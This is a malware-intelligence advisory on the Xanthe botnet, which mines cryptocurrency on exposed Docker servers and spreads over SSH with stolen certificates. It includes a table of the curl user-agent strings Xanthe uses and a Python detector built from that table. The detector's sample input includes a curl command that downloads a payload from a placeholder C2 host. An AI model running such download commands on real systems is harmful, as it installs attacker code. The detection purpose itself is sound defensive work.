Advisory | Malware Intelligence
Target | Docker/Linux
Type | Xanthe Cryptominer
Xanthe is a cryptomining botnet that compromises Docker servers whose API is exposed to the Internet. It targets Linux systems and is modular: each function is implemented in a separate module, and the actual payload is a variant of the XMRig cryptominer.
The malware spreads to further hosts by stealing client-side certificates and using them to log in over Secure Shell (SSH), so no passwords are needed. It also kills security services and competing botnets.
The modules are bash scripts executed by the Linux shell. The main module, Xanthe.sh, loads four further modules that carry out the attacker's tasks:
The user-agent strings the malware passes to curl, and the stage each one corresponds to, are listed below:

Agent String | Functionality
--- | ---
xanthe-start/<version> | Download of killer modules
xanthecheck-$PROC.$MEM | Initialization process
filegetgo/1.5 | Download of miner modules
xanthe-running/1.2 | Post-infection logging
hostcheck/1.5 | SSH spreading command line
qi/1.1 | Docker spreading command line
fczyo-cron/1.5 | Cron scheduled job command line
goteeeem/1.4 | Post-Docker-infection download of main module
shell-success/1.4 | Post-Docker-download logging
xesacheck-running/1.4 | Post-infection check logging
wemusthavegotkilled/1.4 | Report miner not running
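As an added example (not code from the advisory), the table above turned into detection logic: it matches each user-agent string, whether in the user-agent field of a proxy or web log line or on a curl command line recorded by process auditing, and reports which infection stage it indicates. The two log formats and the loose patterns for the templated strings are assumptions of this example.

```python
import re

# User-agent strings from the advisory's table, as anchored regexes. Two are
# templates filled in at run time (a version, and process / memory figures for
# xanthecheck-$PROC.$MEM); how loosely those vary is this example's assumption.
XANTHE_AGENTS = {
    r"xanthe-start/[\d.]+": "download of killer modules",
    r"xanthecheck-[^\s/]+": "initialization process",
    r"filegetgo/1\.5": "download of miner modules",
    r"xanthe-running/1\.2": "post infection logging",
    r"hostcheck/1\.5": "SSH spreading command line",
    r"qi/1\.1": "Docker spreading command line",
    r"fczyo-cron/1\.5": "cron scheduled job command line",
    r"goteeeem/1\.4": "post Docker infection download of main module",
    r"shell-success/1\.4": "post Docker download logging",
    r"xesacheck-running/1\.4": "post infection check logging",
    r"wemusthavegotkilled/1\.4": "report miner not running",
}

# Combined-format proxy/web log line: the user agent is the last quoted field.
COMBINED_UA = re.compile(r'^(?P<src>\S+) .*"(?P<ua>[^"]*)"\s*$')
# Process/EDR command line: curl -A <ua>, -A<ua>, --user-agent <ua> or =<ua>.
CURL_UA = re.compile(r"""curl\b.*?(?:-A|--user-agent)[ =]?['"]?(?P<ua>[^'"\s]+)""")

def classify_agent(ua):
    """Return the advisory's stage description for a Xanthe user agent, else None."""
    for pattern, stage in XANTHE_AGENTS.items():
        if re.fullmatch(pattern, ua):
            return stage
    return None

def scan_lines(lines):
    """Return (line_no, user_agent, stage) for every line carrying a Xanthe agent."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CURL_UA.search(line) or COMBINED_UA.match(line)
        stage = classify_agent(m.group("ua")) if m else None
        if stage:
            hits.append((n, m.group("ua"), stage))
    return hits

# Constructed sample input (not from the advisory): proxy log lines, one of them
# benign, plus an EDR-style process command line; the hosts are placeholders.
SAMPLE_LINES = [
    '10.0.0.5 - - [01/Dec/2020:10:00:00 +0000] "GET /files/pop.sh HTTP/1.1" 200 512 "-" "xanthe-start/1.5"',
    '10.0.0.6 - - [01/Dec/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
    'host=web01 proc=/usr/bin/curl cmdline="curl -A qi/1.1 http://c2.invalid/files/java_c -o /tmp/java_c"',
    '10.0.0.7 - - [01/Dec/2020:10:00:02 +0000] "GET /x HTTP/1.1" 200 10 "-" "xanthecheck-4.8192"',
]
```

Running `scan_lines(SAMPLE_LINES)` flags lines 1, 3 and 4 with their stages; the benign curl on line 2 is left alone because matching is anchored to the whole string.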